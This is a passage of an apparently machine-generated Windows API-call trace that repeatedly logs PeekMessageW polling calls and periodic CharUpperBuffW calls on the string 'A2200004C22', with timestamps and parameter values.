wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee0) returned 0 [0157.619] PeekMessageW (in: lpMsg=0x8beee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee0) returned 0 [0157.619] PeekMessageW (in: lpMsg=0x8beee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee0) returned 0 [0157.619] PeekMessageW (in: lpMsg=0x8beee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee0) returned 0 [0157.619] PeekMessageW (in: lpMsg=0x8beee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee0) returned 0 [0157.619] PeekMessageW (in: lpMsg=0x8beee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee0) returned 0 [0157.619] PeekMessageW (in: lpMsg=0x8beee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee0) returned 0 [0157.619] PeekMessageW (in: lpMsg=0x8beee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee0) returned 0 [0157.619] PeekMessageW (in: lpMsg=0x8beee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee0) returned 0 [0157.619] PeekMessageW (in: lpMsg=0x8beee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee0) returned 0 [0157.619] PeekMessageW (in: lpMsg=0x8beee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee0) returned 0 [0157.619] PeekMessageW (in: lpMsg=0x8beee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee0) returned 0 [0157.619] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0157.619] PeekMessageW (in: lpMsg=0x8beee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee0) returned 0 [0157.619] PeekMessageW (in: lpMsg=0x8beee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee0) returned 0 [0157.619] PeekMessageW (in: lpMsg=0x8beee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee0) returned 0 [0157.620] PeekMessageW (in: lpMsg=0x8beee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee0) returned 0 [0157.620] PeekMessageW (in: lpMsg=0x8beee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee0) returned 0 [0157.620] PeekMessageW (in: lpMsg=0x8beee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee0) returned 0 [0157.620] PeekMessageW (in: lpMsg=0x8beee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee0) returned 0 [0157.620] PeekMessageW (in: lpMsg=0x8beee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee0) returned 0 [0157.620] PeekMessageW (in: lpMsg=0x8beee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee0) returned 0 [0157.620] PeekMessageW (in: lpMsg=0x8beee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee0) returned 0 [0157.620] PeekMessageW (in: lpMsg=0x8beee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee0) returned 0 [0157.620] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0157.620] PeekMessageW (in: lpMsg=0x8beee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee0) returned 0 [0157.620] PeekMessageW (in: lpMsg=0x8beee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee0) returned 0 [0157.620] PeekMessageW (in: lpMsg=0x8beee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee0) returned 0 [0157.620] PeekMessageW (in: lpMsg=0x8beee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee0) returned 0 [0157.620] PeekMessageW (in: lpMsg=0x8beee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee0) returned 0 [0157.620] PeekMessageW (in: lpMsg=0x8beee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee0) returned 0 [0157.620] PeekMessageW (in: lpMsg=0x8beee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee0) returned 0 [0157.620] PeekMessageW (in: lpMsg=0x8beee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee0) returned 0 [0157.620] PeekMessageW (in: lpMsg=0x8beee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee0) returned 0 [0157.620] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0157.620] PeekMessageW (in: lpMsg=0x8beee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee0) returned 0 [0157.620] PeekMessageW (in: lpMsg=0x8beee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee0) returned 0 [0157.621] PeekMessageW (in: lpMsg=0x8beee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee0) returned 0 [0157.621] PeekMessageW (in: lpMsg=0x8beee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee0) returned 0 [0157.621] PeekMessageW (in: lpMsg=0x8beee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee0) returned 0 [0157.621] PeekMessageW (in: lpMsg=0x8beee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee0) returned 0 [0157.621] PeekMessageW (in: lpMsg=0x8beee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee0) returned 0 [0157.621] PeekMessageW (in: lpMsg=0x8beee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee0) returned 0 [0157.621] PeekMessageW (in: lpMsg=0x8beee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee0) returned 0 [0157.621] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0157.621] PeekMessageW (in: lpMsg=0x8beee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee0) returned 0 [0157.621] PeekMessageW (in: lpMsg=0x8beee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee0) returned 0 [0157.621] PeekMessageW (in: lpMsg=0x8beee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee0) returned 0 [0157.621] PeekMessageW (in: lpMsg=0x8beee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee0) returned 0 [0157.621] PeekMessageW (in: lpMsg=0x8beee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee0) returned 0 [0157.621] PeekMessageW (in: lpMsg=0x8beee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee0) returned 0 [0157.621] PeekMessageW (in: lpMsg=0x8beee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee0) returned 0 [0157.621] PeekMessageW (in: lpMsg=0x8beee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee0) returned 0 [0157.621] PeekMessageW (in: lpMsg=0x8beee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee0) returned 0 [0157.621] PeekMessageW (in: lpMsg=0x8beee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee0) returned 0 [0157.621] PeekMessageW (in: lpMsg=0x8beee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee0) returned 0 [0157.621] PeekMessageW (in: lpMsg=0x8beee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee0) returned 0 [0157.621] PeekMessageW (in: lpMsg=0x8beee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee0) returned 0 [0157.621] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0157.622] PeekMessageW (in: lpMsg=0x8beee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee0) returned 0 [0157.622] PeekMessageW (in: lpMsg=0x8beee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee0) returned 0 [0157.622] PeekMessageW (in: lpMsg=0x8beee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee0) returned 0 [0157.622] PeekMessageW (in: lpMsg=0x8beee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee0) returned 0 [0157.622] PeekMessageW (in: lpMsg=0x8beee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee0) returned 0 [0157.622] PeekMessageW (in: lpMsg=0x8beee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee0) returned 0 [0157.622] PeekMessageW (in: lpMsg=0x8beee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee0) returned 0 [0157.622] PeekMessageW (in: lpMsg=0x8beee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee0) returned 0 [0157.622] PeekMessageW (in: lpMsg=0x8beee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee0) returned 0 [0157.622] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0157.622] PeekMessageW (in: lpMsg=0x8beee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee0) returned 0 [0157.622] PeekMessageW (in: lpMsg=0x8beee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee0) returned 0 [0157.622] PeekMessageW (in: lpMsg=0x8beee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee0) returned 0 [0157.622] PeekMessageW (in: lpMsg=0x8beee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee0) returned 0 [0157.622] PeekMessageW (in: lpMsg=0x8beee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee0) returned 0 [0157.622] PeekMessageW (in: lpMsg=0x8beee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee0) returned 0 [0157.622] PeekMessageW (in: lpMsg=0x8beee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee0) returned 0 [0157.622] PeekMessageW (in: lpMsg=0x8beee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee0) returned 0 [0157.622] PeekMessageW (in: lpMsg=0x8beee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee0) returned 0 [0157.622] PeekMessageW (in: lpMsg=0x8beee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee0) returned 0 [0157.623] PeekMessageW (in: lpMsg=0x8beee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee0) returned 0 [0157.623] PeekMessageW (in: lpMsg=0x8beee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee0) returned 0 [0157.623] PeekMessageW (in: lpMsg=0x8beee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee0) returned 0 [0157.623] PeekMessageW (in: lpMsg=0x8beee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee0) returned 0 [0157.623] PeekMessageW (in: lpMsg=0x8beee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee0) returned 0 [0157.623] PeekMessageW (in: lpMsg=0x8beee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee0) returned 0 [0157.623] PeekMessageW (in: lpMsg=0x8beee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee0) returned 0 [0157.623] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0157.623] PeekMessageW (in: lpMsg=0x8beee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee0) returned 0 [0157.624] PeekMessageW (in: lpMsg=0x8beee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee0) returned 0 [0157.624] PeekMessageW (in: lpMsg=0x8beee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee0) returned 0 [0157.624] PeekMessageW (in: lpMsg=0x8beee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee0) returned 0 [0157.624] PeekMessageW (in: lpMsg=0x8beee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee0) returned 0 [0157.624] PeekMessageW (in: lpMsg=0x8beee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee0) returned 0 [0157.624] PeekMessageW (in: lpMsg=0x8beee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee0) returned 0 [0157.624] PeekMessageW (in: lpMsg=0x8beee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee0) returned 0 [0157.624] PeekMessageW (in: lpMsg=0x8beee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee0) returned 0 [0157.624] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0157.624] PeekMessageW (in: lpMsg=0x8beee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee0) returned 0 [0157.624] PeekMessageW (in: lpMsg=0x8beee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee0) returned 0 [0157.624] PeekMessageW (in: lpMsg=0x8beee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee0) returned 0 [0157.624] PeekMessageW (in: lpMsg=0x8beee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee0) returned 0 [0157.624] PeekMessageW (in: lpMsg=0x8beee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee0) returned 0 [0157.624] PeekMessageW (in: lpMsg=0x8beee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee0) returned 0 [0157.624] PeekMessageW (in: lpMsg=0x8beee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee0) returned 0 [0157.624] PeekMessageW (in: lpMsg=0x8beee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee0) returned 0 [0157.624] PeekMessageW (in: lpMsg=0x8beee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee0) returned 0 [0157.624] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0157.624] PeekMessageW (in: lpMsg=0x8beee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee0) returned 0 [0157.624] PeekMessageW (in: lpMsg=0x8beee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee0) returned 0 [0157.625] PeekMessageW (in: lpMsg=0x8beee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee0) returned 0 [0157.625] PeekMessageW (in: lpMsg=0x8beee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee0) returned 0 [0157.625] PeekMessageW (in: lpMsg=0x8beee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee0) returned 0 [0157.625] PeekMessageW (in: lpMsg=0x8beee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee0) returned 0 [0157.625] PeekMessageW (in: lpMsg=0x8beee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee0) returned 0 [0157.625] PeekMessageW (in: lpMsg=0x8beee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee0) returned 0 [0157.625] PeekMessageW (in: lpMsg=0x8beee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee0) returned 0 [0157.625] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0157.625] PeekMessageW (in: lpMsg=0x8beee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee0) returned 0 [0157.625] PeekMessageW (in: lpMsg=0x8beee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee0) returned 0 [0157.625] PeekMessageW (in: lpMsg=0x8beee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee0) returned 0 [0157.625] PeekMessageW (in: lpMsg=0x8beee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee0) returned 0 [0157.625] PeekMessageW (in: lpMsg=0x8beee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee0) returned 0 [0157.625] PeekMessageW (in: lpMsg=0x8beee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee0) returned 0 [0157.625] PeekMessageW (in: lpMsg=0x8beee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee0) returned 0 [0157.625] PeekMessageW (in: lpMsg=0x8beee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee0) returned 0 [0157.625] PeekMessageW (in: lpMsg=0x8beee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee0) returned 0 [0157.625] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0157.625] PeekMessageW (in: lpMsg=0x8beee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee0) returned 0 [0157.625] PeekMessageW (in: lpMsg=0x8beee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee0) returned 0 [0157.625] PeekMessageW (in: lpMsg=0x8beee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee0) returned 0 [0157.625] PeekMessageW (in: lpMsg=0x8beee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee0) returned 0 [0157.626] PeekMessageW (in: lpMsg=0x8beee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee0) returned 0 [0157.626] PeekMessageW (in: lpMsg=0x8beee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee0) returned 0 [0157.626] PeekMessageW (in: lpMsg=0x8beee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee0) returned 0 [0157.626] PeekMessageW (in: lpMsg=0x8beee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee0) returned 0 [0157.626] PeekMessageW (in: lpMsg=0x8beee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee0) returned 0 [0157.626] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0157.626] PeekMessageW (in: lpMsg=0x8beee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee0) returned 0 [0157.626] PeekMessageW (in: lpMsg=0x8beee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee0) returned 0 [0157.626] PeekMessageW (in: lpMsg=0x8beee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee0) returned 0 [0157.626] PeekMessageW (in: lpMsg=0x8beee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee0) returned 0 [0157.626] PeekMessageW (in: lpMsg=0x8beee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee0) returned 0 [0157.626] PeekMessageW (in: lpMsg=0x8beee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee0) returned 0 [0157.626] PeekMessageW (in: lpMsg=0x8beee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee0) returned 0 [0157.626] PeekMessageW (in: lpMsg=0x8beee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee0) returned 0 [0157.626] PeekMessageW (in: lpMsg=0x8beee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee0) returned 0 [0157.626] PeekMessageW (in: lpMsg=0x8beee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee0) returned 0 [0157.626] PeekMessageW (in: lpMsg=0x8beee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee0) returned 0 [0157.626] PeekMessageW (in: lpMsg=0x8beee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee0) returned 0 [0157.626] PeekMessageW (in: lpMsg=0x8beee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee0) returned 0 [0157.626] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0157.626] PeekMessageW (in: lpMsg=0x8beee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee0) returned 0 [0157.627] PeekMessageW (in: lpMsg=0x8beee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee0) returned 0 [0157.627] PeekMessageW (in: lpMsg=0x8beee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee0) returned 0 [0157.627] PeekMessageW (in: lpMsg=0x8beee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee0) returned 0 [0157.627] PeekMessageW (in: lpMsg=0x8beee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, 